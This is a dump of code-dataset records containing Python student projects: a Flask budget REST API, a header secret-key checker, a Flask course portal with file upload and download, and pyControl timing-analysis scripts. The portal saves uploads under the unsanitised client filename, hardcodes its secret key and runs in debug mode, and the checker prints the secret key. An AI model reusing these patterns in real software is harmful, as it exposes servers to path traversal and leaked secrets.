Category('rentUtils', 0)\n db.session.add(default_cat)\n db.session.commit()\n\n print('Initialized database.')\n\n\n###################################################\n####////FUNCTIONS----FUNCTIONS----FUNCTIONS\\\\\\\\####\n###################################################\n\ndef add_category(new_cat_name, limit):\n cat_exists = Category.query.filter_by(name=new_cat_name).first()\n if not cat_exists:\n try:\n new_cat = Category(new_cat_name, limit)\n db.session.add(new_cat)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_category(selected_cat):\n cat_exists = Category.query.filter_by(name=selected_cat).first()\n if cat_exists:\n cats_p = Purchase.query.filter_by(cat_id=cat_exists.id).all()\n if cats_p:\n try:\n for p in cats_p:\n db.session.delete(p)\n except exc.SQLAlchemyError:\n pass\n try:\n db.session.delete(cat_exists)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef get_category(selected_cat_name):\n cat_exists = Category.query.filter_by(name=selected_cat_name).first().as_dict()\n if cat_exists:\n s = db.session.query(func.sum(Purchase.cost)).filter(Purchase.cat_id == cat_exists['id']).scalar()\n if s is None:\n s = 0\n pts = db.session.query(func.sum(Category.limit)).scalar()\n\n if selected_cat_name != 'rentUtils':\n return {\n 'name': cat_exists['name'],\n 'cost': s,\n 'limit': cat_exists['limit'],\n 'purchases': get_purchases_by_cat(selected_cat_name),\n 
'percent_total_spending': int(round((cat_exists['limit']/pts)*100, 0))\n }\n else:\n return {\n 'name': cat_exists['name'],\n 'cost': s,\n 'limit': cat_exists['limit'],\n 'purchases': get_purchases_by_cat(selected_cat_name)\n }\n\n return {}\n\n\ndef get_all_categories():\n try:\n raw_info = [x.as_dict() for x in Category.query.all()]\n for item in raw_info:\n s = db.session.query(func.sum(Purchase.cost)).filter(Purchase.cat_id == item['id']).scalar()\n if s is None:\n s = 0\n item['cost'] = s\n return raw_info\n except exc.SQLAlchemyError:\n return {}\n\ndef add_purchase(name, category, cost, date):\n cat_id = Category.query.filter_by(name=category).first().id\n if cat_id:\n try:\n p = Purchase(cat_id, name, cost, date)\n db.session.add(p)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_purchase(p_id):\n p = Purchase.query.filter_by(id=p_id).first()\n if p:\n try:\n db.session.delete(p)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_purchases(cat, p_list):\n cat_id = Category.query.filter_by(name=cat).first().id\n for x in p_list:\n try:\n temp = Purchase.query.filter(and_(Purchase.cat_id == cat_id, Purchase.name == x)).first()\n db.session.delete(temp)\n except exc.SQLAlchemyError:\n return False\n\n db.session.commit()\n return True\n\n\ndef get_all_purchases():\n try:\n return [x.as_dict() for x in Purchase.query.all()]\n except exc.SQLAlchemyError:\n return {}\n\n\ndef get_purchase_by_id(cat_id):\n try:\n return [x.as_dict() for x in Purchase.query.filter_by(id=cat_id).all()]\n except exc.SQLAlchemyError:\n return {}\n\n\ndef get_purchases_by_cat(cat_name):\n try:\n cat_id = Category.query.filter_by(name=cat_name).first().id\n return [x.as_dict() for x in Purchase.query.filter_by(cat_id=cat_id).all()]\n except exc.SQLAlchemyError:\n return {}\n\n###################################################\n####////APPROUTES----APPROUTES----APPROUTES\\\\\\\\####\n###################################################\n\n\n@app.route(\"/\")\ndef skeleton():\n return render_template('skeleton.html')\n\n\n@app.route(\"/cats\", methods=[\"GET\", \"DELETE\", \"POST\"])\ndef cats():\n if request.method == 'GET':\n if 'cat' in request.args:\n return json.dumps({\n 'category': get_category(request.args['cat'])\n })\n elif 'cat_page' in request.args:\n return render_template('purchaseList.html', info=get_category(request.args['cat_page']))\n else:\n return json.dumps({\n 'categories': get_all_categories()\n })\n elif request.method == 'DELETE' and 'cat' in request.args:\n return json.dumps({\n 'completed': remove_category(request.args.get('cat'))\n })\n elif request.method == 'POST' and 'new_cat_name' in request.json and 'new_cat_limit' in request.json:\n return json.dumps({\n 'completed': add_category(request.json['new_cat_name'], request.json['new_cat_limit'])\n })\n\n\n@app.route(\"/purchases\", methods=[\"GET\", \"DELETE\", \"POST\"])\ndef purchases():\n\n if request.method == 'GET':\n if 'cat' in request.args:\n return json.dumps({\n 'purchases': get_purchases_by_cat(request.args.get('cat'))\n })\n elif 'id' in request.args:\n return json.dumps({\n 'purchase': get_purchase_by_id(request.args.get('id'))\n })\n else:\n return json.dumps({\n 'purchase': get_all_purchases()\n })\n elif request.method == 'DELETE' and 'id' in request.args:\n return json.dumps({\n 'completed': remove_purchase(request.args.get('id'))\n })\n elif request.method == 'DELETE' and 'cat' in request.json and 'names' 
in request.json:\n return json.dumps({\n 'completed': remove_purchases(request.json['cat'], request.json['names'])\n })\n elif request.method == 'POST' and 'name' in request.json and 'category' in request.json and \\\n 'cost' in request.json and 'date' in request.json:\n return json.dumps({\n 'completed': add_purchase(request.json['name'], request.json['category'],\n request.json['cost'], request.json['date'])\n })\n\n\nif __name__ == '__main__':\n app.run()\n", "sub_path": "Undergrad CS1520 Programming Languages for Web Applications/REST API/budget.py", "file_name": "budget.py", "file_ext": "py", "file_size_in_byte": 8738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 94, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 114, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 123, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 126, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 126, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 151, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 151, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 156, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 167, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 180, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 190, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 192, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 202, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 202, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 209, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 217, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 232, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 232, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "json.dumps", 
"line_number": 234, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 237, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 243, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 258, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 259, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 259, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 259, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 263, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 266, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 269, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 269, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 269, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 271, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 273, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 273, "usage_type": "name"}, {"api_name": 
"flask.request.json", "line_number": 273, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 277, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 277, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 277, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 280, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 280, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}]}
+{"seq_id": "630093723", "text": "from enum import Enum\r\nfrom .errors import *\r\nimport traceback\r\n\r\nclass RequestType(Enum):\r\n JSON = 1\r\n FORM = 2\r\n\r\n\r\ndef check_headers(request, secret_key, type):\r\n \r\n try:\r\n secret_key_to_check = request.headers['SECRETKEY']\r\n print(secret_key_to_check == secret_key)\r\n if secret_key_to_check == secret_key:\r\n print(request.headers['Content-Type']+'content')\r\n print(request.method)\r\n if request.method==\"GET\":\r\n return 200\r\n elif 'application/json' in request.headers['Content-Type'] and type.value==1 :\r\n return 200\r\n elif 'multipart/form-data' in request.headers['Content-Type'] and type.value==2 :\r\n return 200\r\n \r\n else:\r\n return 400\r\n except Exception as e:\r\n traceback.print_exc()\r\n return 403\r\n\r\n\r\ndef giveResponse(data,secret_key,request,request_type=RequestType.JSON):\r\n print(secret_key)\r\n # print(data)\r\n check_result = check_headers(request,secret_key,request_type)\r\n if check_result==200:\r\n return data\r\n else:\r\n if check_result==403:\r\n return error403\r\n elif check_result==400:\r\n return error400\r\n", "sub_path": "app/utils/checkheaders.py", "file_name": "checkheaders.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "555116193", "text": "from flask import Flask, render_template, Response, request, redirect, send_from_directory, url_for\nfrom data import User, Post, Student, Disciplines, session\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField\nfrom flask_login import login_user, LoginManager, login_required, logout_user, current_user\nfrom werkzeug.utils import secure_filename\nimport os\n\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = 'gay'\nlogin_manager = LoginManager()\nlogin_manager.login_view ='login'\nlogin_manager.init_app(app)\nfile_path = '/home/vlados/kurs/files'\napp.config['UPLOAD_FOLDER'] = file_path\n\nclass LoginForm(FlaskForm):\n\tusername = StringField('username')\n\tpassword = PasswordField('password')\n\tsubmit = SubmitField('submit')\n\n\n\n@login_manager.unauthorized_handler\n@app.route('/login', methods = ['POST','GET'])\ndef login():\n\tform = LoginForm()\n\tif request.method == 'POST':\n\t\tx = session.query(User).filter(User.nickname == form.username.data).first()\n\t\tif(x and x.password_check(form.password.data)):\n\t\t\tlogin_user(x)\n\t\t\treturn redirect('title')\n\t\telse:\n\t\t\treturn redirect('login')\n\treturn render_template('authorization.html')\n\n@app.route('/')\n@app.route('/title')\ndef title():\n\treturn render_template('title.html',session = session, Post = Post, User = User, current_user = current_user)\n\n\n@app.route('/post', methods = ['POST','GET'])\n@login_required\ndef to_post():\n\tif request.method == 'POST':\n\t\tsession.add(Post(request.form['text'],current_user))\n\t\tsession.commit()\n\t\treturn redirect('title')\n\treturn render_template('post.html')\n\n\n@app.route('/materials')\n@login_required\ndef materials():\n\treturn render_template('usefull_things.html', session = session, Disciplines = Disciplines)\n\n\n@app.route('/materials/upload', methods = ['POST','GET'])\n@login_required\ndef materials_upload():\n\tif request.method =='POST':\n\t\tprint(request.files)\n\t\tf = request.files['filename']\n\t\tf.save(os.path.join(app.config['UPLOAD_FOLDER'],f.filename))\n\t\treturn \"file saved success\"\n\treturn render_template('upload.html')\n\n\n@app.route('/download/')\n@login_required\ndef download(filename):\n\treturn send_from_directory(app.config['UPLOAD_FOLDER'],filename)\n\n\n@app.route('/group_list',methods = ['GET'])\n@login_required\ndef group():\n\treturn render_template('group_list.html', session = session, Student = Student, current_user = current_user)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tlogout_user()\n\treturn redirect('login')\n\n\n@login_manager.user_loader\ndef load_user(id):\n\treturn session.query(User).filter(User.id == id).first()\n\napp.run(debug = True)\n", "sub_path": "file_main.py", "file_name": "file_main.py", "file_ext": "py", "file_size_in_byte": 2594, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 19, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 30, "usage_type": "attribute"}, {"api_name": 
"flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "data.session.query", "line_number": 31, "usage_type": "call"}, {"api_name": "data.User", "line_number": 31, "usage_type": "argument"}, {"api_name": "data.session", "line_number": 31, "usage_type": "name"}, {"api_name": "data.User.nickname", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 42, "usage_type": "call"}, {"api_name": "data.session", "line_number": 42, "usage_type": "name"}, {"api_name": "data.Post", "line_number": 42, "usage_type": "name"}, {"api_name": "data.User", "line_number": 42, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "data.session.add", "line_number": 49, "usage_type": "call"}, {"api_name": "data.session", "line_number": 49, "usage_type": "name"}, {"api_name": "data.Post", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 49, "usage_type": "argument"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "data.session.commit", "line_number": 50, "usage_type": "call"}, {"api_name": "data.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "data.session", "line_number": 58, "usage_type": "name"}, {"api_name": "data.Disciplines", "line_number": 58, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 69, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 75, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 81, "usage_type": "call"}, {"api_name": "data.session", "line_number": 81, "usage_type": "name"}, {"api_name": "data.Student", "line_number": 81, "usage_type": "name"}, {"api_name": "flask_login.current_user", 
"line_number": 81, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 79, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 85, "usage_type": "name"}, {"api_name": "data.session.query", "line_number": 93, "usage_type": "call"}, {"api_name": "data.User", "line_number": 93, "usage_type": "argument"}, {"api_name": "data.session", "line_number": 93, "usage_type": "name"}, {"api_name": "data.User.id", "line_number": 93, "usage_type": "attribute"}]}
+{"seq_id": "497238009", "text": "'''\nAnalysis code for pyControl manuscript vaidation experiments.\n'''\n\nimport os\nimport numpy as np \nimport pylab as plt\n\nfrom scipy.io import loadmat\n\n# Plotting parameters.\nplt.rcParams['pdf.fonttype'] = 42\nplt.rc(\"axes.spines\", top=False, right=False)\n\n# -----------------------------------------------------------------------------\n# Generate figure\n# -----------------------------------------------------------------------------\n\ndef generate_figure():\n latency_analysis('low_load.mat' , fig_no=1 , title='low load')\n latency_analysis('high_load.mat', fig_no=2 , title='high load')\n timing_accuracy('low_load_10ms_pulses.mat' , fig_no=3, title='low load')\n timing_accuracy('high_load_10ms_pulses.mat', fig_no=4, title='high load')\n\n# -----------------------------------------------------------------------------\n# Latency analysis\n# -----------------------------------------------------------------------------\n\ndef latency_analysis(file_name, fig_no=1, title=''):\n '''Plot the distribution over all rising and falling edges of the\n latency between an input and output signals.'''\n\n # Import data.\n\n data_path = os.path.join('..', 'data', 'response latency', file_name)\n data = loadmat(data_path)\n\n # Calculate latencies.\n\n input_rising , input_falling = get_edge_times(data, 'B')\n output_rising, output_falling = get_edge_times(data, 'A')\n input_rising , input_falling = complete_pulses(input_rising, input_falling)\n output_rising, output_falling = complete_pulses(output_rising, output_falling)\n input_rising , input_falling, output_rising, output_falling = input_leads(\n input_rising , input_falling, output_rising, output_falling) \n\n rising_latencies = output_rising - input_rising\n falling_latencies = output_falling - input_falling\n\n all_latencies = np.hstack([rising_latencies, falling_latencies])\n\n # Plotting\n\n plt.figure(fig_no, clear=True, figsize=[3,3])\n bins = np.arange(np.min(all_latencies)-50, np.max(all_latencies)+50, 20)\n plt.hist(all_latencies , bins)\n plt.ylabel('# events')\n plt.xlabel('Latency (μs)')\n plt.title('Response latency ' + title)\n plt.tight_layout()\n\n print(f'Latency mean:{np.mean(all_latencies):.0f}, SD:{np.std(all_latencies):.0f}, '\n f'min:{np.min(all_latencies):.0f}, max:{np.max(all_latencies):.0f}')\n print(f'Fraction of edge latencies < 2ms: {np.mean(all_latencies<2000) :.4f}')\n\n# -----------------------------------------------------------------------------\n# Output timing accuracy\n# -----------------------------------------------------------------------------\n\ndef timing_accuracy(file_name, target_dur_ms=10, fig_no=1, title=''):\n '''Plot the distribution of discrepancies between the duration\n of high pulses in the signal and the target duration.'''\n\n # Import data.\n\n data_path = os.path.join('..', 'data', 'timing accuracy', file_name)\n data = loadmat(data_path)\n \n # Calculate pulse durations.\n\n rising_edges, falling_edges = get_edge_times(data, 'A')\n rising_edges, falling_edges = complete_pulses(rising_edges, falling_edges)\n \n pulse_durs = falling_edges - rising_edges\n dur_errors = pulse_durs-target_dur_ms*1000\n \n # Plotting\n\n plt.figure(fig_no, clear=True, figsize=[3,3])\n bins = np.arange(np.min(dur_errors)-50, np.max(dur_errors)+50, 20)\n plt.hist(dur_errors, bins)\n plt.ylabel('# events')\n plt.xlabel('Timing error (μs)')\n plt.title('Timing accuracy ' + title)\n plt.tight_layout()\n\n print(f'Error mean:{np.mean(dur_errors):.0f}, 
SD:{np.std(dur_errors):.0f}, '\n f'min:{np.min(dur_errors):.0f}, max:{np.max(dur_errors):.0f}')\n print(f'Fraction of errors < 1ms: {np.mean(dur_errors<1000) :.4f}')\n\n\n# -----------------------------------------------------------------------------\n# Maximum event rate analysis\n# -----------------------------------------------------------------------------\n\ndef missed_event_analysis(fig_no=1):\n '''For a set of data files each comprising an output signal following\n an input square wave at different frequencies, compute the fraction \n of input edges that are missed in the output signal an plot as a \n function of frequency.'''\n\n data_dir = os.path.join('..', 'data', 'maximum event rate')\n file_names = os.listdir(data_dir)\n file_event_rates = [int(file_name.split('Hz')[0])*2 for file_name in file_names]\n file_missed_proportions = [_missed_proportion(os.path.join(data_dir, file_name))\n for file_name in file_names]\n plt.figure(fig_no, figsize=[3,3], clear=True)\n plt.plot(file_event_rates, np.array(file_missed_proportions)*100, 'o')\n plt.xlabel('Continuous event rate (Hz)')\n plt.ylabel('Proportion of missed events (%)')\n plt.axhline(0, 0, color='k', linewidth=0.5)\n plt.xlim(0, 1000)\n plt.ylim(-0.5, 6)\n plt.tight_layout()\n\n\ndef _missed_proportion(data_path):\n '''Compute the proportion of events missed for one data file.'''\n\n # Import data.\n\n data = loadmat(data_path)\n\n # Find rising and falling edges.\n\n input_rising , input_falling = get_edge_times(data, 'B')\n output_rising, output_falling = get_edge_times(data, 'A')\n input_rising , input_falling = complete_pulses(input_rising, input_falling)\n output_rising, output_falling = complete_pulses(output_rising, output_falling)\n input_rising , input_falling, output_rising, output_falling = input_leads(\n input_rising , input_falling, output_rising, output_falling)\n\n # Proportion of events missed.\n\n n_input_events = len(input_rising) + len (input_falling)\n n_output_events = len(output_rising) + len (output_falling)\n p_missed = (n_input_events-n_output_events)/n_input_events\n return p_missed\n\n# -----------------------------------------------------------------------------\n# Utility functions\n# -----------------------------------------------------------------------------\n\ndef get_edge_times(data, channel):\n '''Return the times in us of rising and falling edges on the \n specified channel'''\n sampling_interval_us = data['Tinterval'].squeeze()*1e6\n signal = (data[channel].squeeze()>1).astype(int) # Signal converted to int 0/1 for low high.\n rising_edges = np.where(np.diff(signal)== 1)[0]*sampling_interval_us\n falling_edges = np.where(np.diff(signal)==-1)[0]*sampling_interval_us\n return rising_edges, falling_edges\n\ndef complete_pulses(rising_edges, falling_edges):\n '''Ensure first edge is rising and there are the same number of rising\n and falling edges.'''\n if rising_edges[0] > falling_edges[0]:\n falling_edges = falling_edges[1:] # Ensure first edge is rising.\n if len(rising_edges) > len(falling_edges):\n rising_edges = rising_edges[:len(falling_edges)] # Ensure same number of rising and falling edges.\n return rising_edges, falling_edges\n\ndef input_leads(input_rising , input_falling, output_rising, output_falling):\n '''Ensure the first input pulse occurs before the first output\n pulse and last output pulse follows last input pulse.'''\n if input_rising[0] > output_rising[0]: # Ensure first pulse is input.\n output_rising = output_rising[1:]\n output_falling = output_falling[1:]\n if 
input_rising[-1] > output_rising[-1]: # Ensure last pulse is output.\n input_rising = input_rising[:-1]\n input_falling = input_falling[:-1]\n return input_rising, input_falling, output_rising, output_falling\n", "sub_path": "framework performance validation/analysis code/validation_exp_analysis.py", "file_name": "validation_exp_analysis.py", "file_ext": "py", "file_size_in_byte": 7486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pylab.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pylab.rc", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.io.loadmat", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 50, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.hist", "line_number": 56, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 57, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "scipy.io.loadmat", "line_number": 77, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 90, "usage_type": "call"}, {"api_name": "pylab.hist", "line_number": 91, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 92, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 93, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 94, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pylab.figure", "line_number": 117, "usage_type": "call"}, {"api_name": 
